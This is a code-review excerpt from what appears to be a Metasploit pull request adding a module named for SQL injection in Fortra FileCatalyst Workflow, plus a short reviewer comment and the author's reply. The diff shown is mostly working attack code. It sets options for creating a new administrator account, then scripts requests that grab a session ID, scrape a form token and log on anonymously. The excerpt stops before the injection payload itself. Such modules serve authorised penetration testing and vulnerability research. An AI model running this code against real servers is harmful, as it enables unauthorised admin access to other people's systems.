modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,290 @@
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
+    ])
+  end
+
+  def run
+    # 1) Request workflow to obtain a session ID
+    print_status('Starting SQL injection workflow...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'workflow/')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    case res.code
+    when 200
+      print_good('Server reachable.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /JSESSIONID=(\w+);/
+      jsessionid = ::Regexp.last_match(1)
+      print_status("JSESSIONID value: #{jsessionid}")
+    else
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.')
+    end
+
+    # 2) logon.jsp to retrieve a valid FCWEB.FORM.TOKEN
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/jsp/logon.jsp;jsessionid=#{jsessionid}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    res = res.body
+    if res =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      token_value = ::Regexp.last_match(1)
+      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    # 3) logonAnonymous.do
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/logonAnonymous.do?FCWEB.FORM.TOKEN=#{token_value}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #1: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    # 4) createNewJob.do
```

Comment:
It would be nice to either elaborate a bit in those comments, or remove them altogether, as `4) createNewJob.do` isn't super-duper informative.

Reply:
Thank you for taking time to review my PR and providing feedback!

I've removed the comments, it should be clear from the code. I've used these initially for myself as separators while writing out the module.